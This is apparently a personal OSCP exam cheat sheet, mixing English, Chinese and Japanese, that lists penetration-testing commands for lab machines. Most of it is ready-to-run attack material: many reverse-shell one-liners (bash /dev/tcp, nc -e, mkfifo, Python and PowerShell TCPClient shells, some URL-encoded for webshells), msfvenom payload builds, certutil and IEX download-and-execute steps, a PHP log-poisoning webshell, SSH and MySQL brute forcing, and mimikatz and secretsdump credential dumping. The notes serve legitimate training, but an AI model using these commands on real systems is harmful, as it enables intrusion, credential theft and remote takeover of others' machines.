总结

[WDavid404]

OSCP-CheatSheet

https://notchxor.github.io/oscp-notes/2-web/LFI-RFI/ https://github.com/WDavid404/OSCP-CheatSheet https://github.com/saisathvik1/OSCP-Cheatsheet

Windows privilege escaliation guide

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ https://github.com/xMilkPowderx/OSCP/blob/master/Windows%20Priv%20Esc.md

linux privilege escalation list

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-shutdown-poweroff-privilege-escalation/

---

Notes：proving-grounds-all-33-warm-up-machines

https://medium.com/@abhirupkonwar04/proving-grounds-all-33-warm-up-machines-pwned-618cdb3d9607

---

Other

• Hacktricks: https://book.hacktricks.xyz

• https://gtfobins.github.io/ : a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

• CVE exploit code list： https://github.com/Al1ex

• https://github.com/danielmiessler/SecLists

• MSFVenom Cheat Sheet: https://web.archive.org/web/20220607215637/https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/

• PayloadsAllTheThings (e.g MS SQL injection ): https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md

On kali

• webshell files (php, asp, ...): /usr/share/webshells/ tree /usr/share/webshells/

useful resource

• reverse generator: https://www.revshells.com/
• Encode online： https://www.urldecoder.org/
• URLdecode only online: https://meyerweb.com/eric/tools/dencoder/
• 64base Encode online： https://www.base64encode.org/
• The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis： https://cyberchef.io/
• brainfuck （Tool to decode/encode in Brainfuck, an esoteric programming language consisting of characters like ++++---[+++].） https://www.dcode.fr/brainfuck-language
• morse decocder: https://morsedecoder.com/
• hash analyzer: https://www.tunnelsup.com/hash-analyzer/
• hashed decrypt: https://hashes.com/en/decrypt/hash

[WDavid404]

autoscan at first

sudo env "PATH=$PATH" autorecon 192.168.195.248 (meanwhile, try “ rustscan -a <IP> -- -sV -A”)

see nmap port report: find

- os info
- host info 
- domain info:  
e.g
in http-title

- find service version info

initial recon

-->

SNMP (udp 161)

snmpwalk -v 2c -c public 192.168.190.149 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
snmpbulkwalk -c public -v2c 192.168.182.149 . --》 里面包含的信息比autorecon的多。。比如password

ftp via anonymouse

• if we can login, try upload a reverse file .
• the default dic for anonymouse connection is “/var/ftp” → may be useful in LFI attack
• we can also upload files with the same file name as we've known and see if we can get reverse shell from the target
• -- e.g “product-control” file: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.220 1234 > /tmp/f “web-control” file: nc -e /bin/sh 192.168.45.220 1235 smb --> find share folders or user list

enum4linux -a target_ip
smbmap  -H <URL or IP>      //to show share dir list as anonymous user (e..g smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1)
smbclient //active.htb/Replication  (access a share dir as anonymous user)

• if we can login, try upload a reverse file
• we can also upload files with the same file name as we've known and see if we can get reverse shell from the target
• -- e.g product-control: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.220 1234 > /tmp/f web-control: nc -e /bin/sh 192.168.45.220 1235

53/port dns:

• dig axfr @<DNS_IP>

google for exploit

• e.g. How to exploit port 6667

access web service via browser,

• check source code: Title, credentials info, cms version info, etc
• check CMS version from Burp suite (response header or body), help page, etc
• -- wordpress enumeration: wpscan --url http://xxxxxx -e u,t,p check /robots.txt sometimes, we need to bypass user-agent restirction (e.g. only search engine can access robots.txt): curl --user-agent “Google/1.0” <IP>:<port>/robots.txt

feroxbuster/gobuster/ffuf for http service subdomain brute force: ffuf -c -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://devvortex.htb/ -H "Host: FUZZ.devvortex.htb" -fw 5338 | grep --color=auto 200 -→ after finding, eidt /etc/hosts file and added this subdomain on the same line search for zip, backup files: feroxbuster -u https://oscp.example.com:8443 -k -C 404 -x zip -B

get creadentials info

1. crack username and credentials (hash or password)
2. get id_rsa

or, try hydra hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://192.168.163.142:22

get extra info from pdf, photos

-  exiftool -a -u PDF_NAME.pdf
- exiftool xxxx.jpg
- steghide extract -sf filename.jpg

decode secret file or string: cat secret.txt | base64 -d

SSH brute force (weak password policy)

hydra -L user -P /usr/share/wordlists/rockyou.txt ssh://$IP -V 
hydra -L user -P user ssh://$IP -V -u                  (check if user and password are same)
hydra -L user -P user ssh://$IP -V 

or when you don't have user info nmap -p 22 --script ssh-brute.nse <target> -vvv

case: AD set

Try

 impacket-GetUserSPNs -request -dc-ip <domain url or ip> <domain host name>   (as anonymouse user request)
 e.g. GetNPUsers.py htb.local/ -dc-ip forest.htb -request

 impacket-GetUserSPNs -request -dc-ip 172.16.214.10 MEDTECH.com/leon (PWD: rabbit:))    
 --> get administartor hash info

 john --wordlist=/usr/share/wordlists/rockyou.txt admin.txt  to crack hash

impacket-psexec <domain>/administrator:"<password>"@192.168.246.189
impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11

netexec <target(s)> -u username -p password --continue-on-success
netexec <target(s)> -u username -p password --local-auth
netexec <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords 

dcsync

# -just-dc: Extract only NTDS.DIT (NTLM hashes and kerberos keys).
impacket-secretsdump -just-dc example.local/username:password@<target-ip>
# -just-dc-ntlm: Extract only NTDS.DIT data (NTLM hashes only).
impacket-secretsdump -just-dc-ntlm example.local/username:password@<target-ip>

Try using bloodhound as the one of last methods

one example: https://daemonexala.medium.com/hack-the-box-forest-without-metasploit-tjnulls-list-for-oscp-3260e035a4bd

Use reverse shell

• RCE exploit

• upload file to FTP, web page ---> some case: we cannot upload aspx file,instead, we can upload a web.config file web.config file could execute code. Let’s craft a web.config file with the sample code as below, and put the code to download and execute a powershell script that we will be hosting on our own http server.

• FLI try:
  ../../../../../../../../../etc/passwd ../../../../var/log/apache2/access.log

e.g.

192.168.224.80/console/file.php?cmd=whoami
(
other cases:
$IP:8593/index.php?book=../../../var/log/apache2/access.log&cmd=id
$IP:8593/index.php?book=../../../var/log/apache2/access.log&&cmd=id
$IP:8593/index.php?book=../../../var/log/apache2/access.log?cmd=id
$IP:8593/index.php?book=../../../var/log/apache2/access.log;cmd=id
)

http://192.168.224.80/console/file.php?file=/etc/passwd
http://192.168.167.80/console/file.php?file=/var/log/auth.log&cmd=id 
curl http://192.168.167.80/console/file.php?file=/var/log/auth.log&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.45.204%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22sh%22)%27

e.g1. if we have file.php URL, we can try: 
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u http://192.168.210.80/console/file.php?FUZZ= -t 100  -fs 0
OR
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u http://192.168.210.80/console/file.php?FUZZ -t 100  -fs 0
OR
ffuf -w /usr/share/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://$IP/secret/evil.php?FUZZ=/etc/passwd -fs 0
OR
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u http://192.168.210.80/console/file.php?FUZZ=../../../../../../../../../../etc/passwd -t 100  -fs 0

• php wrapper (https://notchxor.github.io/oscp-notes/2-web/LFI-RFI/) e.g.

  
  php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd
  http://localhost/include.php?page=php://filter/convert.base64-encode/resource=secret.inc
  http://localhost/include.php?page=php://filter/read=convert.base64-encode/resource=secret.inc
  http://localhost/include.php?page=php://filter/resource=/etc/passwd

 - cron job on web page
-  SQL injection 

 - log poisoning
 nc -nv ip 22     (22 port--> SSH log poisoning)
anyword/<?php system($_GET['cmd']); ?>

 3306/port mysql
hydra -l root -P /urs/share/wordlists/rockyou.txt mysql://192.168.226.118

============================= 
# PE phase
## both for linux and windows
check  wp-config.php file (/var/www/html)
e.g. `cat wp-config.php | grep DB`

## PE for Active Directory
mimikatz tool

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" .\mimikatz.exe "token::elevate" "lsadump::sam" "exit"

/// dcsync mimikatz # lsadump::dcsync /user:corp\Administrator mimikatz # lsadump::dcsync /user:corp\

check history 
`cat C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
` 

credential info in registry, etc

FOR DEFAULT USER

(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName

FOR DEFAULT PASSWORD

(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword

we can also search SAM, SYSTEM file under windows/system32 folder
then, crack them -→  `impacket-secretsdump -sam SAM -system SYSTEM LOCAL`

check whether credetial info are avaible for lateral movement:           
`netexec winrm 10.10.167.140-142 -u 'tom_admin' -H '4979d69d4ca66955c075c41cf45f24dc' 
` 
login via winrm          
`evil-winrm  -H 4979d69d4ca66955c075c41cf45f24dc -u tom_admin  -i 10.10.167.140
` 
 login to MSSQL server:
`impacket-mssqlclient oscp.exam/sql_svc:Dolphin1@10.10.209.148 -windows-auth `

## PE for linux standalone
auto enum tool
`linpeas -a
` 
manual enum check

sudo -l (check what commands current user can run with sudo privilege) cat /etc/passwd | grep bash () cat /etc/crontab (cronjobs running) ls -al /etc/cron cat .bash_history (passwords saved in history) env (passwords saved in environment variable) uname -ar (kernel exploits) cat /etc/-release (kernel exploits) ss -tulnp (check for any potential services running) ---------> curl 127.0.0.1:
getcap -r / 2>/dev/null (capabilities) find / -perm -u=s -type f 2>/dev/null (SUID) find / -perm -g=s -type f 2>/dev/null (SGID) sudo --version (public exploits) id (check for docker and lxd group) ls -la /etc/passwd (writable /etc/passwd) ls -la /etc/shadow (writeable /etc/shadow) ps aux | grep -i "root" --color=auto

find / -name cronlog 2>/dev/null ----- check cron job log info find / -writable 2>/dev/null
find / -perm -o+w -type f 2>/dev/null | grep /proc -v --- checck writable files under /proc dir

cd /home grep -rnH "password" .

cd /var/www/ grep -rnH "password" .

find . -type f -exec ls -lsha {} + | grep -E -i '.secret|secret|token|key|api|password|user

find .dat file contains SHA string: find /opt/ofbiz/runtime/data/derby/ofbiz/seg0 -type f -name “*.dat” -exec grep “SHA” {} \;

check if credentials stored in .bash_history find /home -name .bash_history -exec cat {} \;

recursively grep all directories and subdirectories: grep -rnH "password" .

cat C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

try su to switch user to root:   `su root`,   `su` 
try pspy64 

## PE for windows standalone
 whoami /priv
 winpeas
 --->
find backup (.zip) file
credential info in registry, etc

FOR DEFAULT USER

(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName

FOR DEFAULT PASSWORD

(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword

interesting service

we can also search SAM, SYSTEM file under windows/system32 folder
then, crack them on kali -→ ` impacket-secretsdump -sam SAM -system SYSTEM LOCAL`

[WDavid404]

Privilege escalation （提权）

https://github.com/WDavid404/Note_tryhackme/issues/2

find / -perm -u=s -type f 2>/dev/null

• / denotes that we will start from the top (root) of the file system and find every directory
• -perm denotes that we will search for the permissions that follow:
• -u=s denotes that we will look for files which are owned by the root user
• -type states the type of file we are looking for
• f denotes a regular file, excluding directories and special files
• 2>/dev/null means we will redirect all errors to /dev/null. In other words, we will ignore all errors.

find / -perm -g=s -type f 2>/dev/null

sudo -l

[WDavid404]

nmap port scan:

nmap -p- -T5 <ip> -v   #-p- to scan ports from 1 through 65535
# then,
nmap -p 22,25,80, A <ip> -v

sudo nmap -sC -sV -oN mailsrv1/nmap 192.168.50.242 sudo nmap -p- -sV -T5 192.168.202.52 //T5有时候扫描不出东西，此时改为T4等重新尝试 nmap -p 22,80,443 -A -v

port scan using nc

nc -vz 192.168.135.19 1-65535 2>&1 | grep succeeded nc -vz 192.168.135.19 22 2>&1 | grep succeeded

proxychains (sock5 proxy)下用nmap时只能用-sT

sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 172.16.6.240 172.16.6.241 172.16.6.254

Rustscan

install

wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb dpkg -i rustscan_2.0.1_amd64.deb

scan

rustscan -a 10.10.216.174 --ulimit 5000 -- -sV -A -oN rustscan.txt

[WDavid404]

$python -m SimpleHTTPServer 9000 $python3 -m http.server 9000

接收端

• Linux： wget 10.10.5.107:9000/rev-svc.exe -O /temp/rev-svc.exe
• Windows用Powershell： wget 10.10.5.107:9000/rev-svc.exe -o rev-svc.exe

---

reverse shell后的命令操作

python -c ‘import pty; pty.spawn(“/bin/bash”)’ python3 -c 'import pty;pty.spawn("/bin/bash")' ---》 为了执行/bin/bash命令

//在tty之后执行下面命令： export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH export TERM=xterm256-color export SHELL=bash alias ll=‘clear; ls -lsaht —color=auto’ ctrl + z stty raw -echo; fg; reset //此时发现即使我们按下ctrl+c，也不会从当前的session里断开 stty rows 200 columns 200

---

讲解：

• export TERM=xterm -- this will give us access to term commands such as clear.
• stty raw -echo; fg. --- This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.

if the shell sucked

This shell sucked so I ran the following command to upgrade it to a more stable one: /usr/bin/script -qc /bin/bash /dev/null

issue

looking into PATH environment variable , we can see that the path is set to current user home directory, due to which it’s not able to find the binary of the command. we can do export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

[WDavid404]

Reverse shell command:

https://www.revshells.com/ https://highon.coffee/blog/reverse-shell-cheat-sheet/

Linux shell

#! /bin/bash
bash -i >& /dev/tcp/192.168.121.100/4444 0>&1

如果是remote环境（特别是执行injection的时候）下则可以尝试执行
bash -c ’bash -i >& /dev/tcp/192.168.121.100/4444 0>&1‘
 或者尝试 
bash ’bash -i >& /dev/tcp/192.168.121.100/4444 0>&1‘

另一种思路： try saving your rev shell command into a file, then use the query to download it using wget and just run it. Use port 443 for rev shell and 80 for local http server.

on Windows PC c:\tools\nc64.exe -e cmd.exe 10.10.187.189 4444

certutil -urlcache -f http://192.168.45.211/nc64.exe  c:/windows/temp/nc64.exe;
c:/windows/temp/nc64.exe -e cmd.exe 192.168.45.211 4444

msfvenom msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe //是service msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.8.50 LPORT=4444 -f exe -o rev.exe //是exe msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.hta msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d" msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.50.4 LPORT=443 -f python -b "\x00\x0a" -v shellcode Note：-v指定输出的变量名（默认时是buf） 因为使用的是msfvenom with meterpreter，所以接收端需要使用msfconsole （而不是nc） msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <KALI_IP>;set LPORT <PORT>;run;" 接到reverse shell后，输入shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.184 LPORT=5555 -f dll -o EnterpriseServiceOptional.dll 教训： 没有-f的话即使生成了dll也无法实际动作

nc

On the target machine

nc -e /bin/sh 10.0.0.1 4242
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242

C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446

//linux
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.36 3333 >/tmp/f

//linux + python3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",attackerport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'

On NC receiver side nc -lvnp 4444

The encoded reverse shell one-liner （Powershell）

应用场景： RCE的payload （比如 python3 49488.py -u mark@relia.com -p OathDeeplyReprieve91 -i 'http://web02.relia.com:14080' -c powershell.exe -a '-e JABjAGwAaQBlAG4A。。。。‘） one-liner command payload

$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

encode时注意：对于对象是Windows的时候选择CRLF

64base Encode online： https://www.base64encode.org/

powershell -e base64_payload

php cmd uses reverse shell (URL encode)

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.45.243',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

---> http://192.168.223.249:8000/cms/media/webshell.pHp?cmd=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27192.168.45.243%27%2C4443%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22

msfvenom

Non-stage： msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.243 LPORT=443 -f exe -o met.exe msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf 对应 nc -vlp 443

Stage：

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.223 LPORT=4445 -f exe -o met.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf

kali@kali:~/beyond$ sudo msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.45.204
LHOST => 192.168.45.243

msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443

msf6 exploit(multi/handler) > set ExitOnSession false -->It specifies that the listener stays active for new sessions without the need to restart it for every incoming session.
ExitOnSession => false

msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.

php reverse shell

for linux <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.180/4445 0>&1'");?>

other reference: http://pentestmonkey.net/tools/php-reverse-shell

[WDavid404]

xfeerdp

xfreerdp /u:offsec /p:lab /w:1200 /h:800 +fonts +clipboard /v:192.168.223.250 /drive:.,kali-share /cert-ignore

xfreerdp /d:za.tryhackme.com /u:'user.name' /p:'qwertqwertqwert123!!' /v:192.168.186.62 /w:800 /h:700 /drive:.,kali-share +clipboard 

// xfreerdpコマンド例(フルスクリーン)
xfreerdp /u:tsutomu-nakamura /p:qwertqwertqwert123\!\! /f +fonts +clipboard  /v:192.168.1.103:3389 /drive:.,kali-share

// xfreerdpコマンド例(解像度指定
xfreerdp /u:tsutomu-nakamura /p:password /w:800 /h:500 +fonts +clipboard /v:192.168.1.103:3389 /drive:.,kali-share

//with domain
kali@kali:~$ xfreerdp /u:stephanie /d:corp.com /v:192.168.50.75 /w:800 /h:500 /drive:.,kali-share

//using hash instead of password xfreerdp /v:192.168.0.1 /u:username /pth:

To exit from full-screen： CTRL-ALT-ENTER

evil-winrm

evil-winrm -i MACHINE_IP -u thmuser1 -p Password321
evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!" -P 5985

Download file

*Evil-WinRM* PS C:\Users\hacker\Documents> download <file path in the target host > <kali local path>
*Evil-WinRM* PS C:\users\wario\Desktop> download local.txt .
--》 下载local.txt到kali的当前目录（即启动Evil-winRM时的目录）

Upload file：

*Evil-WinRM* PS C:\Users\hacker\Documents> upload <file path in kali> <the target host's path>
*Evil-WinRM* PS C:\users\wario\Desktop> upload test.txt  .
--> 从kali上启动Evil-winRM时的目录里上传test.txt文件到target机器上

[WDavid404]

FTP

https://eng-entrance.com/linux-command-ftp

Login:

• ftp 192.168.4.25 (输入username：anonymous， password没有直接敲回车)
• ftp 192.168.154.247:14020 (anonymous)
• ftp://user:password@host:port/path

Upload: ftp > put ファイル名 Download: get ファイル名 多个文件Upload： mput ファイル名 多个文件Donwload： mgetファイル名 （mget *.jpg）--> 注：隐藏文件（比如 .@admins）需要另外使用get单独下载 mkdir：ディレクトリを作成する delete：ファイルを削除する chmod：ファイルのアクセス権の変更

Download all files in a dir

wget -r ftp://user:pass@server.com/

## anonymous case
wget -r ftp://anonymous:@192.168.218.157/backup

nmap script for ftp

ls -al /usr/share/nmap/scripts|grep ftp --> list all script for ftp sudo nmap -sS -p21 --script ftp-brute 192.168.172.144

[WDavid404]

script sample

sudo nmap -sS -vv -p25 192.168.216.1-200 -oG nmap_out2
grep open nmap_out2|cut -d" " -f2 > list_smb

for ip in $(cat list.txt); do host $ip.megacorpone.com; done

for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips

利用nc扫描subnet里哪个ip开放了445 port for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done The -z flag to check for a listening port without sending data, -v for verbosity, and -w set to 1 to ensure a lower time-out threshold.

[WDavid404]

Windows相关

参考： Windows系统下的URL情况

• http://192.168.194.189/meteor/uploads/simple-backdoor.pHP?cmd=type%20C:\\xampp\\passwords.txt

check是Powershell还是cmd

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

在curl request里使用其URL encode后的内容，如下： kali@kali:~$ curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.50.189:8000/archive

利用powercat实现reverse shell

kali@kali:~$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .

kali@kali:~$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

使用下面命令的URL encode内容 IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell 于是最终的request为： kali@kali:~$ curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell' http://192.168.50.189:8000/archive

传输Windows PC上的文件到kali machine (SMB)

https://discord.com/channels/780824470113615893/1148907181480104028

1）使用 impacket-smbserver

在Kali机器上： 安装： apt install python3-impacket 使用： impacket-smbserver shareName sharePath -smb2support （比如：impacket-smbserver smb_wei . -smb2support）

在Windows PC上 连接： C:\>net use \\192.168.45.159\smb_wei copy文件：

C:\WINDOWS\Temp>copy .\Desktop\ticket.doc \\192.168.45.159\smb_wei\ticket.doc
      1 file(s) copied.

连接smb上 smbclient -U "DOMAIN\user" //server/example e.g. smbclient //192.168.223.248/Users --user=relia.com/offsec%lab smbclient //192.168.194.10/offsec --》没有username和password的情况，直接敲回车

2) RDP mounting shared folder:

Using xfreerdp: On Kali: xfreerdp /cert-ignore /compression /auto-reconnect /u: offsec /p:lab /v:192.168.212.250 /w:1600 /h:800 /drive:test,/home/kali/Documents/pen- 200

On windows: copy mimikatz.log \\tsclient\test\mimikatz.log --》 “tsclient”存在于Network目录里

3） 利用WebDAV

https://github.com/WDavid404/OSCP/issues/12#issuecomment-1875504860

4) netcat

On your machine nc -nlvp 4433 > <filename>

On Target nc -nv 192.168.45.xx 4433 < <filename>

scp

[On Kali] scp stuart@192.168.x.144:/opt/backup/sitebackup3.zip .

在windows PC上下载kali上的exe文件

1. 利用iwr 【Kali】python3 -m http.server 80 【Windows】PS C:\Users\dave> iwr -uri http://192.168.45.244/winPEASx64.exe -Outfile winPEAS.exe
2. 利用curl 在win PC上 curl -o winPEAS.exe http://192.168.194.10/winPEAS.exe
3. smb 在Kali机器上，利用smbserver上传文件到target windows PC （192.168.50.195）：

smbclient //192.168.50.195/share -c 'put config.Library-ms'然后输入kali上的密码

4. Windows上执行powershell wget powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe

5. Windows PC上利用certutil工具（在SQI injection的练习时用到）

   certutil -urlcache -f http://192.168.45.211/nc64.exe  c:/windows/temp/nc64.exe;
   c:/windows/temp/nc64.exe -e cmd.exe 192.168.45.211 4444

SMB enum

https://www.geeksforgeeks.org/smb-enumeration/ smbclient -L <target IP>

kali@kali:~$ smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234
kali@kali:~$ smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234

enum4linux -U <target IP> smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1

crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares ==》 to list the SMB shares and their permissions on MAILSRV1（192.168.50.242）

SMB shared access

//访问TMP目录 smbclient //172.16.208.11/TEMP --user=MEDTECH.COM/joe%Flowers1

//上传mimikatz文件到TMP目录 smbclient //172.16.208.11/TEMP -c 'put mimikatz.exe' --user=MEDTECH.COM/joe%Flowers1

//直接把transfer目录里的文件下载本地 smbclient '//192.168.213.248/transfer' -N -c 'prompt OFF;recurse ON;mget ' smbclient '//192.168.213.248/transfer' -N -c 'prompt OFF;recurse ON;mget '

[WDavid404]

feroxbuster

usage:

• https://github.com/epi052/feroxbuster
• https://medium.com/@cuncis/discover-hidden-directories-and-files-with-feroxbuster-the-ultimate-web-enumeration-tool-cheat-cb55b033baa9

feroxbuster -u http://192.168.236.249 -x html -x php -x aspx feroxbuster -u http://192.168.172.144 -w /usr/share/wordlists/dirb/common.txt -t 20 -x zip,html,php

ffuf (made by Golang) for file search

https://github.com/ffuf/ffuf Installation: git clone https://github.com/ffuf/ffuf ; cd ffuf ; go get ; go build

Usage:

ffuf -w /path/to/wordlist -u https://target/FUZZ
//可以组合搜索关键词W1和W2
kali@kali$ ffuf -u https://W2/W1 -w ./wordlist.txt:W1,./domains.txt:W2

//recursion
ffuf -u http://example.com/FUZZ -w /path/to/wordlist -recursion 

//-e to specify extensions
ffuf -e .php,.zip,.bak -u http://example.com/FUZZ -w /path/to/wordlist 

kali@kali$ ffuf -w /path/to/paramnames.txt -u https://target/script.php?FUZZ=test_value -fs 4242
kali@kali$ ffuf -w /path/to/vhost/wordlist -u https://target -H "Host: FUZZ" -fs 4242

Reference：
https://jpn.nec.com/cybersecurity/blog/210604/index.html

实例：
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://$IP/FUZZ

sub-domain brute-force:

ffuf -c -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://devvortex.htb/ -H "Host: FUZZ.devvortex.htb" -fw 5338 | grep --color=auto 200 Note: when found a sub-domain，don't forget to add sub-domain info to /etc/hosts

Gobuster for dir search

Gobuster supports different enumeration modes, including fuzzing and dns。 e.g. kali@kali:~/beyond$ gobuster dir -u http://192.168.50.242 -w /usr/share/wordlists/dirb/common.txt -o mailsrv1/gobuster -x txt,pdf,config

Use dir mode, which enumerates files and directories. gobuster dir -u 192.168.50.20 -w /usr/share/wordlists/dirb/common.txt -t 5

Gobuster to search pdf files on a target web site gobuster dir -u 192.168.194.197 -w /usr/share/wordlists/dirb/common.txt -t 5 -x .pdf

HP： https://github.com/OJ/gobuster

wfuzz

